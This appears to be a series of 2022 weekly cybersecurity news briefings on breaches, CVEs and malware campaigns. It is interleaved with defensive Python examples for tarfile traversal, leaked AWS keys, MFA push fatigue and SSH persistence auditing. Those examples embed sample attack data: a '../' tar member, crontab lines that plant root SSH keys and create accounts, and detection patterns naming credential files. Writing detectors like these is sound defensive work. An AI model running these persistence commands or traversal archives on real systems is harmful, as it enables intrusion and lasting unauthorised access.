The online bank Revolut, which holds a banking licence in Lithuania, has been the victim of a cyber-attack in which the personal information of more than 50,000 customers was compromised. The incident, which occurred a week ago, has been described as "highly targeted". According to the Lithuanian data protection authority, 50,150 customers have been affected, 20,687 of them in the European Economic Area. Details of how the attacker gained access to the bank's database have not been disclosed, but all indications are that the threat actor relied on social engineering as the entry vector. The authority notes that the exposed information includes email addresses, first and last names, postal addresses, phone numbers, limited payment card details and account details. Revolut has issued a statement saying that the personal data compromised varies from customer to customer and that no card details or passwords were accessed. More info ⇾

* * *

Critical vulnerabilities in industrial control system environments

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a total of eight security advisories warning of vulnerabilities in industrial control systems (ICS), including critical flaws affecting Dataprobe iBoot-PDU products. Power distribution units (PDUs) are used to remotely manage the power supply of equipment and are common in critical infrastructure. Claroty researchers discovered seven vulnerabilities in the Dataprobe product, including CVE-2022-3183 and CVE-2022-3184 with a CVSS of 9.8, which could allow unauthenticated attackers to gain access to affected systems and execute code on them remotely. David Weiss, CEO of Dataprobe, has indicated that the security issues are patched in version 1.42.06162022 and that the remaining ones are addressed by proper configuration, such as disabling SNMP, telnet and HTTP. More info ⇾

* * *

Old Python vulnerability affects thousands of repositories

Researchers at Trellix have released details of the exploitation of a vulnerability in the Python standard library that has been overlooked for 15 years. The bug could affect more than 350,000 open-source repositories and can lead to code execution. The report explains that they rediscovered the vulnerability while reviewing other, unrelated bugs, concluding that it was CVE-2007-4559, first documented in August 2007 and still unpatched today. The only change, made in 2022 through the Python bug tracker, was a documentation update warning developers about the risk. Trellix points out that the bug persists, and provides explanatory videos on how to exploit it. The vulnerability is in the extract and extractall functions of the tarfile module, which write each member to the path stored in the archive without validation, so an attacker who puts ".." path components in a member's filename can make a TAR file overwrite arbitrary files outside the extraction directory. In addition, Trellix has announced patches for just over 11,000 projects, although, for the moment, the Python Software Foundation has not commented on the vulnerability, so extreme caution is recommended as this is a bug that represents a clear risk to the software supply chain. More info ⇾

* * *

Chromeloader malware increases its activity and boosts its capabilities

Researchers from Microsoft and VMware have reported a malicious campaign by the Chromeloader malware, a malicious Chrome browser extension, aimed at infecting victims' devices with multiple malicious programs. During the first quarter of 2022, Chromeloader came to the fore as adware and later became a stealer specialising in data stored in the browsers of targeted users. However, according to Microsoft, there is currently an ongoing campaign attributed to the threat actor tracked as DEV-0796 that uses this malware to launch much more powerful and targeted payloads. Chromeloader has been found to be deployed in ISO files distributed via malicious advertisements and YouTube video comments. In addition, as VMware details in its report, there are at least 10 variants of this malware disguised as utilities for managing movie subtitles or playing music and, more worryingly, a variant that drops the Enigma ransomware from an HTML file. More info ⇾
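To make the tarfile issue above concrete, here is an added Python example; it is not code from the briefing, from Trellix or from the Python project. It builds a small archive in memory containing a member named `../escaped.txt`, shows a pre-extraction check that catches such members (absolute names, `..` traversal and links pointing outside the target), and refuses the whole archive. On interpreters that ship the PEP 706 extraction filters (Python 3.12 and the security backports to earlier 3.x releases), it also passes `filter="data"` to `extractall`, which is the upstream fix for this class of bug. The archive contents and the scratch directory are constructed for the example.

```python
"""Guarding tarfile extraction against CVE-2007-4559 (path traversal).

Added example; not code from the briefing, Trellix or the Python project.
Historically `tarfile.extractall()` wrote each member to the path stored in
the archive, so a member named '../escaped.txt' lands one directory above the
extraction target. The archives below are constructed in memory.
"""
import io
import os
import tarfile
import tempfile
from pathlib import Path
from typing import Dict, List


def build_tar(members: Dict[str, bytes]) -> bytes:
    """Build an uncompressed tar archive (member name -> content) in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def _inside(dest: Path, candidate: Path) -> bool:
    """True if `candidate`, once resolved, stays within `dest`."""
    return candidate.resolve().is_relative_to(dest)


def unsafe_members(tar: tarfile.TarFile, dest: Path) -> List[str]:
    """Names of members that would be written outside `dest`.

    Rejects absolute names, '..' traversal, and symlinks or hardlinks whose
    target lies outside the destination directory.
    """
    dest = dest.resolve()
    bad = []
    for member in tar.getmembers():
        ok = not os.path.isabs(member.name) and _inside(dest, dest / member.name)
        if ok and member.issym():
            # Symlink targets are relative to the link's own directory.
            ok = _inside(dest, (dest / member.name).parent / member.linkname)
        elif ok and member.islnk():
            # Hardlink targets are relative to the archive root.
            ok = _inside(dest, dest / member.linkname)
        if not ok:
            bad.append(member.name)
    return bad


def safe_extractall(data: bytes, dest: Path) -> List[str]:
    """Extract `data` into `dest`, refusing the whole archive if any member
    escapes. Returns the names that were extracted."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        bad = unsafe_members(tar, dest)
        if bad:
            raise ValueError(f"refusing archive, members escape {dest}: {bad}")
        # Python 3.12+ (and the security backports) ship PEP 706 filters; the
        # 'data' filter is the upstream fix and rejects the same members.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, **kwargs)
        return [m.name for m in tar.getmembers()]


def demo() -> dict:
    """Exercise the check on a malicious and a clean archive in a scratch dir."""
    malicious = build_tar({"readme.txt": b"hello\n", "../escaped.txt": b"owned\n"})
    clean = build_tar({"readme.txt": b"hello\n", "docs/notes.txt": b"notes\n"})
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "extract"
        dest.mkdir()
        with tarfile.open(fileobj=io.BytesIO(malicious), mode="r") as tar:
            flagged = unsafe_members(tar, dest)
        try:
            safe_extractall(malicious, dest)
            refused = False
        except ValueError:
            refused = True
        extracted = safe_extractall(clean, dest)
        return {
            "flagged": flagged,
            "refused": refused,
            # True only if an unguarded extractall had written the escaping member.
            "escaped_file_written": (Path(tmp) / "escaped.txt").exists(),
            "clean_extracted": extracted,
            "clean_content": (dest / "docs" / "notes.txt").read_bytes(),
        }


if __name__ == "__main__":
    print(demo())
```

Checking every member before extracting anything matters: validating members one at a time while extracting would leave a half-extracted archive on disk when a late member is rejected, and a symlink extracted earlier can redirect a later, apparently harmless relative path outside the target.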
September 23, 2022
Cyber Security
Cyber Security Weekly Briefing, 9 — 16 September
Microsoft fixes two 0-day and 63 other vulnerabilities in Patch Tuesday Microsoft has fixed 63 vulnerabilities in its September Patch Tuesday, including two 0-days, one of them actively exploited, and another five critical flaws that would allow remote code execution. The actively exploited 0-day, identified as CVE-2022-37969 and CVSS 7.8, was discovered by researchers from DBAPPSecurity, Mandiant, CrowdStrike and Zscaler and affects the Common Log File System (CLFS), allowing an attacker to gain system privileges. On the other hand, the second 0-day that has not been exploited is listed as CVE-2022-23960 and with CVSS 5.6, and it refers to a cache speculation restriction vulnerability. Microsoft Dynamics CRM (CVE-2022-35805 and CVE-2022-34700), 2 others in IKE (CVE-2022-34722 and CVE-2022-34721) and, finally, a flaw in Windows TCP/IP (CVE-2022-34718), all of which would allow remote code execution. More info → * * * Analysis of the OriginLogger keylogger Researcher Jeff White from Unit 42 in Palo Alto has published the results of his recent analysis on the OriginLogger keylogger, which is considered to be the heir to Agent Tesla. It is used to steal credentials, screenshots and all kinds of device information and is for sale on sites that specialise in spreading malware. Its infection chain is initiated through different types of droppers, but usually a Microsoft Office document with malicious macros, which redirect to a page from which a file with an obfuscated script is downloaded, used at the same time for downloading a payload that will be used to create persistence and schedule different tasks. The payload will also contain PowerShell code and two encrypted binaries, one of which is a loader and the other the actual OriginLogger payload. Another feature that makes OriginLogger a separate version of Agent Tesla is the variety of data exfiltration methods, using SMTP and FTP protocols and servers, web pages with their own panels or Telegram channels and bots. 
More info →

* * *

Lampion malware distributed in new phishing campaign

Cofense researchers have analysed an email phishing campaign whose attachment contains a script that downloads and executes the Lampion malware. Lampion, first seen in 2019, is a banking trojan that steals information from the infected device: it connects to its command-and-control (C2) server and can overlay a page on top of banking login forms to capture the user's credentials. The campaign sends fraudulent emails from stolen corporate accounts, attaching fake payment receipts hosted on WeTransfer and urging the recipient to download them. Once the recipient downloads and opens the document, several VBS scripts run and the attack chain begins. Lampion focuses mainly on Spanish-speaking targets and abuses cloud services such as Google Drive and pCloud to host the malware.

More info →

* * *

SAP Security Bulletins

SAP has issued 16 security advisories on its September Security Patch Day. One of them addresses 55 Chromium vulnerabilities affecting several versions of SAP Business Client; the rest fix high-priority flaws in other products. Among the high-priority fixes are a cross-site scripting (XSS) vulnerability in SAP Knowledge Warehouse, CVE-2021-42063 (CVSS 8.8), and CVE-2022-35292 (CVSS 7.8), a service path flaw in SAP Business One that allows privilege escalation to SYSTEM.
The second priority note concerns SAP BusinessObjects, affected by two vulnerabilities: CVE-2022-39014 (CVSS 7.7), which could give an attacker access to unencrypted sensitive information, and CVE-2022-28214 (CVSS 7.8), an information disclosure flaw in the service. SAP has also updated the note for CVE-2022-35291 (CVSS 8.1), affecting SAP SuccessFactors, to restore the file attachment functionality.

More info →

* * *

Webworm activity analysis

Symantec's threat research team published a post yesterday detailing the activity of a group called Webworm, which reportedly shares TTPs and tooling with the threat actor known as Space Pirates, leading the researchers to believe they may be the same group. According to the investigation, the group has been active since 2017 and has conducted attacks and espionage campaigns against government agencies and companies in the IT, aerospace and energy sectors, mainly in Asian countries. Its usual toolset consists of modified versions of the Trochilus, Gh0st RAT and 9002 RAT remote access trojans, used as backdoors and delivered by loaders hidden in decoy documents. The RATs used by Webworm remain hard for security tools to detect, as their evasion, obfuscation and anti-analysis techniques are still effective.

More info →
September 16, 2022
Cyber Security
Cyber Security Weekly Briefing, 27 August — 2 September
Critical vulnerability in Atlassian Bitbucket Server and Data Center

Atlassian has warned its users about a new critical vulnerability in Bitbucket Server and Data Center that should be patched immediately. The flaw, CVE-2022-36804, has a CVSS v3 score of 9.9 according to Atlassian and allows command injection through specially crafted HTTP requests, opening the way to remote code execution. Exploitation is not complex and does not require high privileges: the attacker only needs read access to a public or private repository, and no user interaction is needed. All Bitbucket Server and Data Center versions from 6.10.17 to 8.3.0 are affected; patches have been published for versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2 and 8.3.1, and 6.x versions will not be patched. For users who cannot patch yet, Atlassian recommends temporarily disabling public repositories. Meanwhile, Max Garrett, the researcher who found the vulnerability and reported it to Atlassian, has promised to release a PoC in 30 days and has claimed that Atlassian's patch should not be very difficult to circumvent.

More info →

* * *

Intellexa offers a 0-day exploit for iOS and Android

A document belonging to the spyware company Intellexa, leaked on Twitter by the vx-underground account, shows a commercial offer for spyware priced at 8 million euros. The spyware works on iOS 15.4.1 and Android 12 and, since it relies on 0-day exploits, it is unlikely to have been patched, so newer versions of either operating system may also be affected. The exploit gives remote access to the data on the compromised devices. According to the document, the infection vector is a link that the victim must click for the payload to be injected into the device.
The offer also includes a one-year warranty, a platform for analysing the extracted data, ten concurrent infections and a catalogue of a hundred other successful infections as examples.

More info →

* * *

Use of Log4j vulnerabilities against targets in Israel

Microsoft has published details of a recent investigation by its Threat Intelligence Center (MSTIC) into a wave of attacks by the MuddyWater threat actor (tracked by Microsoft as MERCURY) against targets in Israel. According to the researchers, the actor has been exploiting the well-known Log4Shell vulnerability to compromise unpatched software. This time the attacks mainly targeted SysAid, an IT management application, rather than the VMware products traditionally hit in these campaigns. MuddyWater used the vulnerability as the initial entry point into the victim's systems, then dropped web shells to run commands, created users with administrative privileges, stole credentials with Mimikatz and moved laterally with tools such as RemCom or Windows Management Instrumentation. To prevent these attacks, Microsoft recommends applying the patches for this set of vulnerabilities, available since January 2022.

More info →

* * *

More than 1,000 iOS apps found exposing hard-coded AWS credentials

Symantec's Threat Hunting team has found nearly 2,000 mobile apps containing hard-coded AWS (Amazon Web Services) credentials. Most of them (1,856) are iOS apps, while only 37 are Android apps. 77% of the apps were confirmed to contain valid AWS access tokens that could be used to directly access private cloud services.
Those valid tokens could also let an attacker reach cloud instances hosting live service databases with millions of records, including user account details, internal communications and other sensitive data, depending on the type of application. Symantec's research is intended to warn mobile app developers of the dangers of over-relying on AWS credentials or handling them insecurely, which can expose the mobile app supply chain and open the door for malicious actors to private databases, leading to potential data breaches and exposure of end users' personal data.

More info →

* * *

Google patches 24 vulnerabilities in Chrome

Google's latest security bulletin fixes 24 vulnerabilities, including a critical flaw (CVE-2022-3038), and adds the Sanitizer API to protect users from XSS injection attacks. Most of the patched vulnerabilities were memory management issues, use-after-free and buffer overflow flaws affecting components such as WebUI and Screen Capture. Google has also corrected several security policy and incorrect implementation vulnerabilities. Although there is no evidence that these vulnerabilities are being actively exploited, a serious unpatched vulnerability affecting the operating system clipboard through Chromium-based browsers remains, and it can be exploited without any authorisation or interaction from the user. Google recommends installing the latest version of the browser to fix these flaws.

More info →
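For the hard-coded AWS credentials described in the Symantec item above, the check a practitioner wants is a scanner over the printable strings of an app bundle. The following Python is an added example written for this briefing, not Symantec's tooling or any app's code: the regexes and the "secret" label heuristic are assumptions, the sample strings are constructed, and the key pair is AWS's own documentation example rather than a live credential.

```python
import math
import re
from typing import Iterable

# Shapes to look for in printable strings pulled from an app bundle (`strings`
# output, plist/JSON config, decompiled code). AKIA = long-term IAM user key,
# ASIA = temporary STS key. AWS secret keys are 40 characters of the base64
# alphabet, so the secret pattern is a heuristic confirmed by a nearby label
# and an entropy check. These patterns are this example's assumptions.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])((?:AKIA|ASIA)[0-9A-Z]{16})(?![A-Z0-9])")
SECRET_TOKEN_RE = re.compile(r"(?<![A-Za-z0-9/+])([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])")
SECRET_LABEL_RE = re.compile(r"(?i)secret")
MIN_SECRET_ENTROPY = 3.0   # bits per character; real secrets sit around 4.5


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; used to drop repetitive false positives."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def find_aws_credentials(strings: Iterable[str]) -> list:
    """Scan extracted strings and return one finding per access key ID.

    A finding carries the key ID, the index of the string it was found in,
    whether it is a temporary (ASIA) key, and, when a labelled 40-character
    high-entropy token sits on the same or the following string, that token
    as the candidate secret access key.
    """
    lines = list(strings)
    findings = []
    for i, line in enumerate(lines):
        for m in ACCESS_KEY_RE.finditer(line):
            key_id = m.group(1)
            window = " ".join(lines[i:i + 2])        # this string and the next one
            secret = None
            if SECRET_LABEL_RE.search(window):
                for cand in SECRET_TOKEN_RE.finditer(window):
                    token = cand.group(1)
                    if token != key_id and shannon_entropy(token) >= MIN_SECRET_ENTROPY:
                        secret = token
                        break
            findings.append({
                "access_key_id": key_id,
                "index": i,
                "temporary": key_id.startswith("ASIA"),
                "secret": secret,
            })
    return findings


# Constructed sample of `strings`-style output; the key pair is AWS's own
# documentation example (not a live credential).
SAMPLE_STRINGS = [
    "AWSConfiguration",
    "accessKey=AKIAIOSFODNN7EXAMPLE",
    "secretKey=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "https://s3.amazonaws.com/example-bucket/",
    "com.example.app.analytics",
]

if __name__ == "__main__":
    for finding in find_aws_credentials(SAMPLE_STRINGS):
        print(finding)
```

Run it over the output of `strings` on an IPA's main binary or over its bundled plist and JSON files. A hit with a candidate secret should be treated as a leaked credential and rotated; a temporary (ASIA) key still deserves attention, since the way it ended up in the binary is the same.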
September 2, 2022
Cyber Security
Cyber Security Weekly Briefing, 8 — 19 August
Google reports largest DDoS attack in history

Google researchers have reported the largest DDoS attack ever recorded. On 1 June, a Google Cloud Armor customer received a series of HTTP DDoS attacks that peaked at 46 million requests per second (RPS). This layer 7 DDoS attack is the largest of its kind, 76% larger than the largest previously known. According to the researchers, the attack came from 5,256 IP addresses spread across 132 countries and used encrypted (HTTPS) requests; about 3% of the requests came from Tor exit nodes. The geographical distribution and the types of unsecured services abused to generate the traffic match the Mēris botnet family. The attack lasted approximately 69 minutes and stopped when, the researchers believe, the actor realised it was not having the expected impact given the resources employed. Cloud Armor blocked the attack and the customer kept its services online.

More info →

* * *

Cisco suffers cybersecurity incident

Cisco has issued a statement confirming that it was the victim of a data compromise on 24 May. According to the company, the initial entry vector was the theft of an employee's Google credentials, which were saved in the browser. The attackers then used social engineering and phishing to get the employee to accept malicious multi-factor authentication (MFA) push notifications, gaining access to the corporate VPN and escalating privileges from there. The Yanluowang ransomware group has claimed responsibility in an email sent to BleepingComputer, providing evidence and stating that the breach involved 2.75 GB of data in 3,100 files.
Cisco, for its part, says the attackers were only able to steal non-sensitive data from a folder linked to the compromised employee's account, adding that it found no evidence that they reached critical internal documentation such as product development material or sensitive customer or employee data, and that no ransomware was deployed, since none of its data was encrypted.

More info →

* * *

11 vulnerabilities in Chrome fixed

Google has released Stable Channel version 104.0.5112.101 for Mac and Linux, and 104.0.5112.102/101 for Windows, fixing a total of 11 vulnerabilities. Among them, CVE-2022-2856 stands out because it is being actively exploited. Discovered by Google Threat Analysis Group researchers Ashley Shen and Christian Resell, it is an insufficient validation of untrusted input in Intents. Also notable is CVE-2022-2852, rated critical: a use-after-free in FedCM discovered by Sergei Glazunov of Google Project Zero. Google has withheld further details of the vulnerabilities until most users have updated.

More info →

* * *

Microsoft warns of ongoing phishing campaigns by SEABORGIUM actor

Researchers at the Microsoft Threat Intelligence Center (MSTIC) have issued an advisory warning of new phishing campaigns by the threat actor SEABORGIUM, also known as ColdRiver or TA446. The campaigns mainly target NATO organisations and NATO member countries to obtain sensitive information, although Microsoft has also detected attacks against countries in the Baltics, the Nordics and Eastern Europe. SEABORGIUM focuses on defence and intelligence companies, non-governmental organisations (NGOs) and intergovernmental organisations (IGOs), think tanks and higher education.
SEABORGIUM operators use social engineering, including fraudulent social media profiles, to build trust with their victims before sending phishing emails with malicious URLs or attachments that lead to a page where the victim enters their credentials.

More info →

* * *

New ransomware GwisinLocker

Security researchers have tracked a new ransomware family, GwisinLocker, targeting South Korean healthcare, industrial and pharmaceutical companies. It can encrypt Windows and Linux servers, including ESXi hosts and virtual machines. Operated by the threat actor Gwisin (meaning "ghost" or "spirit" in Korean), it is believed, based on the ransom note contents, to be in the hands of an advanced persistent threat (APT) group linked to North Korea. On Windows, the infection starts with an MSI installer that requires specific command-line parameters to execute the DLL embedded in the MSI itself. That DLL performs the encryption by injecting itself into a Windows system process, evading antivirus detection, and can also encrypt files in safe mode. The Linux sample analysed is a sophisticated piece of malware with features designed specifically for Linux servers, targeting VMware ESXi virtual machines. Notably, GwisinLocker combines AES symmetric encryption with SHA-256 hashing, generating a unique key for each file.

More info →
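The Cisco intrusion above hinged on the employee eventually accepting one of a series of MFA push prompts. The following Python is a detection for that "push fatigue" pattern, added as an example for this briefing rather than anything from Cisco's or Microsoft's reporting: it assumes a constructed log format with one line per push result, which you would map onto your identity provider's export, and the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed log format (one line per push event from an identity provider);
# the field names are an assumption, so adapt the regex to your IdP's export.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) user=(?P<user>\S+) "
    r"event=mfa_push result=(?P<result>approved|denied|timeout)(?: src_ip=(?P<ip>\S+))?$"
)


def parse_line(line: str):
    """Parse one event line; returns None for lines that are not push events."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "user": m["user"], "result": m["result"], "src_ip": m["ip"]}


def detect_push_fatigue(lines, window=timedelta(minutes=15), min_rejections=3):
    """Alert when a user approves a push after >= min_rejections denied or
    timed-out pushes within `window`. Events are sorted first, so an
    out-of-order export is fine. A normal approval resets the count."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    rejected = defaultdict(deque)        # user -> timestamps of recent rejections
    alerts = []
    for e in events:
        q = rejected[e["user"]]
        while q and e["ts"] - q[0] > window:      # expire rejections outside the window
            q.popleft()
        if e["result"] in ("denied", "timeout"):
            q.append(e["ts"])
        elif len(q) >= min_rejections:           # an approval right after a burst
            alerts.append({
                "user": e["user"],
                "approved_at": e["ts"],
                "rejections": len(q),
                "burst_started": q[0],
                "src_ip": e["src_ip"],
            })
            q.clear()
        else:
            q.clear()
    return alerts


# Constructed sample: bob rejects four prompts in under two minutes and then
# approves; carol's single denial an hour earlier is normal behaviour.
SAMPLE_LOG = """\
2022-05-24T08:00:10Z user=alice event=mfa_push result=approved src_ip=10.1.1.5
2022-05-24T08:03:12Z user=bob event=mfa_push result=denied src_ip=198.51.100.7
2022-05-24T08:03:40Z user=bob event=mfa_push result=timeout src_ip=198.51.100.7
2022-05-24T08:04:05Z user=bob event=mfa_push result=denied src_ip=198.51.100.7
2022-05-24T08:04:30Z user=bob event=mfa_push result=denied src_ip=198.51.100.7
2022-05-24T08:06:02Z user=bob event=mfa_push result=approved src_ip=198.51.100.7
2022-05-24T09:30:00Z user=carol event=mfa_push result=denied src_ip=10.1.1.9
2022-05-24T10:30:00Z user=carol event=mfa_push result=approved src_ip=10.1.1.9
""".splitlines()

if __name__ == "__main__":
    for alert in detect_push_fatigue(SAMPLE_LOG):
        print(alert)
```

An alert from this rule is a reason to treat the approving session as suspect (terminate it and re-verify the user out of band) rather than proof of compromise; tune `window` and `min_rejections` against your own baseline of accidental denials. Number-matching or FIDO2 authenticators remove the attack altogether, which is the longer-term fix.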
August 19, 2022
Cyber Security
Top 3 most read cybersecurity posts this year
In our weekly summer compilation of the most relevant and most read content on the Telefónica Tech blog since the beginning of the year, this time we bring you the three cybersecurity posts with the most visits. Read them and find out why.

Differences between encryption, hashing, encoding and obfuscation. The first thing to do is to clarify the terms we are dealing with in these readings, and nothing is better for that than this post, where we learn to differentiate between very relevant terms in cybersecurity. (Cyber Security, June 1, 2022)

Where is your company on the cybersecurity journey? This post will test your perception of how well protected your company is against possible attacks. Do you dare? (Cyber Security, April 20, 2022)

How Lokibot, the malware used by Machete to steal information and login credentials, works. We go one step further and up a level with this post, where we explain what Lokibot is and how it works. (Cyber Security, June 29, 2022)
August 10, 2022
Cyber Security
Cyber Security Weekly Briefing, 30 July - 5 August
Possible link between Raspberry Robin malware and Evil Corp infections

The Microsoft Threat Intelligence Center (MSTIC) team has published new information about the Raspberry Robin malware, first detected by Red Canary in September 2021 [1]. Its main propagation method is infected USB devices, and one of its main features is the use of QNAP NAS devices as command-and-control (C2) servers. In the update, Microsoft reports that Raspberry Robin, in the later stages of an intrusion, deploys the FakeUpdates malware, traditionally linked to the DEV-0206 actor, on infected networks. Once FakeUpdates has been delivered, the observed activity leads to actions traditionally attributed to DEV-0243 (Evil Corp) prior to its ransomware deployments. In terms of impact, the malware has been detected in hundreds of organisations across a multitude of industries.

[1] https://redcanary.com/blog/raspberry-robin/

More info: https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0206-DEV-0243

VMware critical security advisory

VMware has issued a critical security advisory (VMSA-2022-0021) covering ten recently reported and patched vulnerabilities. These include a critical flaw discovered by VNG Security researcher Petrus Viet and tracked as CVE-2022-31656 (CVSSv3 9.8): an authentication bypass affecting local domain users that could allow an unauthenticated attacker to gain administrator privileges.
Of the remaining vulnerabilities, six are rated "important" (CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31664 and CVE-2022-31665) and three "moderate" (CVE-2022-31657, CVE-2022-31662 and CVE-2022-31663); they include remote code execution, privilege escalation and cross-site scripting (XSS) bugs, among others. The flaws affect VMware Workspace ONE Access (Access), VMware Workspace ONE Access Connector (Access Connector), VMware Identity Manager (vIDM), VMware Identity Manager Connector (vIDM Connector), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manager. Although VMware urges customers to apply the patches as soon as possible, no active exploitation has been detected so far.

More info: https://www.vmware.com/security/advisories/VMSA-2022-0021.html

Vulnerabilities in Apache HTTP Server

Multiple vulnerabilities have been discovered in Apache HTTP Server affecting versions prior to 2.4.54. A remote attacker could exploit some of them to cause a denial of service, disclose sensitive information, perform cross-site scripting (XSS) or bypass security restrictions on the target system. CVE-2022-31813 [1] stands out with a CVSSv3 of 9.8: under certain conditions (a client-supplied Connection header marking them as hop-by-hop), mod_proxy does not forward the X-Forwarded-* headers to the origin server, which allows bypassing IP-based authentication on a backend that relies on those headers. These bugs also affect many products that bundle the Apache server, such as those from IBM [2] and F5 [3], so it is recommended to update Apache HTTP Server as soon as possible following the vendor's instructions.
[1] https://nvd.nist.gov/vuln/detail/CVE-2022-31813
[2] https://www.ibm.com/support/pages/node/6595149
[3] https://support.f5.com/csp/article/K21192332

More info: https://httpd.apache.org/security/vulnerabilities_24.html

Remote code execution vulnerability in DrayTek routers

The Trellix Threat Labs team has disclosed a serious remote code execution vulnerability affecting DrayTek routers. Exploitation of the flaw, tracked as CVE-2022-32548 (CVSSv3 10.0) [1], requires no user interaction as long as the device's management interface is configured to be reachable over the network. A successful attacker gains access to the device's internal resources, compromises the device completely and can even launch attacks against the LAN from the device in its default configuration. The flaw affects the Vigor 3910 and 28 other DrayTek models that share the same code base, and has been patched by the vendor. Trellix has also published a video [2] detailing the exploitation process, so it is recommended not to expose the administration interface to the Internet, to reset passwords and to update affected devices to the latest firmware.

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32548
[2] https://youtu.be/9ZVaj8ETCU8

More info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html

RapperBot: new botnet targeting Linux systems

Fortinet security researchers have discovered a new botnet, RapperBot, that specifically targets Linux systems. The malware is based on the original Mirai source code but stands out for features that are rare in this kind of malware, such as its own command-and-control (C2) protocol.
Also unlike Mirai, RapperBot brute-forces SSH servers rather than Telnet, testing lists of credentials that the malware downloads from its own infrastructure. Once it gains access to a server, the bot adds a new SSH key and creates a cron job that re-adds the user every hour in case an administrator discovers and deletes the account. RapperBot's main purpose is currently unknown, as its authors have kept its DDoS functions limited; however, the addition of persistence and detection-evasion mechanisms suggests that the operators may be interested in selling initial access to ransomware actors.

More info: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery
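An audit for the kind of persistence RapperBot leaves behind (an added SSH key plus an hourly cron job that recreates the account), written as an added example and not taken from Fortinet's report: it fingerprints every authorized_keys entry and compares it with an approved set, and flags user-crontab entries whose command touches key or account material. The key blobs, the approved set and the rogue entries are constructed, and the command names matched by the cron regex are this example's assumptions.

```python
import base64
import hashlib
import re

# Commands in a cron entry that should never appear unreviewed; extend to taste.
SUSPICIOUS_CRON_RE = re.compile(
    r"authorized_keys|useradd|adduser|usermod|/etc/passwd|/etc/shadow|/etc/sudoers"
)


def key_fingerprint(entry: str):
    """OpenSSH-style SHA256 fingerprint of one authorized_keys entry, or None
    if the entry has no parseable key blob. Leading option fields such as
    no-pty or command="..." (without embedded spaces) are skipped."""
    parts = entry.split()
    for i, part in enumerate(parts):
        if part.startswith(("ssh-", "ecdsa-", "sk-")):
            try:
                raw = base64.b64decode(parts[i + 1], validate=True)
            except (IndexError, ValueError):
                return None
            digest = base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
            return "SHA256:" + digest
    return None


def audit_persistence(authorized_keys_text: str, crontab_text: str, approved: set):
    """Return findings as (source, line_number, message) tuples: keys whose
    fingerprint is not in `approved`, unparseable key lines, and user-crontab
    entries (5 schedule fields + command) whose command matches the regex."""
    findings = []
    for n, line in enumerate(authorized_keys_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fp = key_fingerprint(line)
        if fp is None:
            findings.append(("authorized_keys", n, "unparseable entry"))
        elif fp not in approved:
            findings.append(("authorized_keys", n, f"unapproved key {fp}"))
    for n, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        if SUSPICIOUS_CRON_RE.search(command):
            findings.append(("crontab", n, f"'{schedule}' runs: {command}"))
    return findings


# Constructed data: the blobs are base64 of placeholder bytes, not real keys,
# and the rogue entries mirror the behaviour described above (an added key plus
# an hourly job that recreates the account).
GOOD_BLOB = base64.b64encode(b"constructed-admin-laptop-key").decode()
ROGUE_BLOB = base64.b64encode(b"constructed-bot-key").decode()
SAMPLE_AUTHORIZED_KEYS = f"""\
# keys approved by the platform team
ssh-ed25519 {GOOD_BLOB} admin@laptop
ssh-rsa {ROGUE_BLOB} bot
"""
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
0 * * * * echo "ssh-rsa AAAAB3 bot" >> /root/.ssh/authorized_keys
0 * * * * useradd -m -s /bin/bash svcuser 2>/dev/null
"""
APPROVED_FINGERPRINTS = {key_fingerprint(f"ssh-ed25519 {GOOD_BLOB} admin@laptop")}

if __name__ == "__main__":
    for source, n, msg in audit_persistence(SAMPLE_AUTHORIZED_KEYS, SAMPLE_CRONTAB,
                                            APPROVED_FINGERPRINTS):
        print(f"{source}:{n}: {msg}")
```

In practice you would feed it the contents of every `~/.ssh/authorized_keys` on the host, the per-user crontabs from `/var/spool/cron` and the approved fingerprints from your configuration management; the point of comparing fingerprints rather than comments is that the comment field is attacker-controlled.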
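The Apache item above is a reminder that a backend which trusts X-Forwarded-* for IP-based authentication has to handle the header being absent or spoofed. The following Python shows the fragile pattern beside a hardened resolver; it is an added example, not Apache code or any project's middleware, and the proxy subnet and the allow-list are assumptions for the example.

```python
import ipaddress

# Assumed topology for the example: a reverse proxy tier in 10.0.0.0/24 fronts
# the application, and an admin endpoint is restricted to 203.0.113.0/24.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
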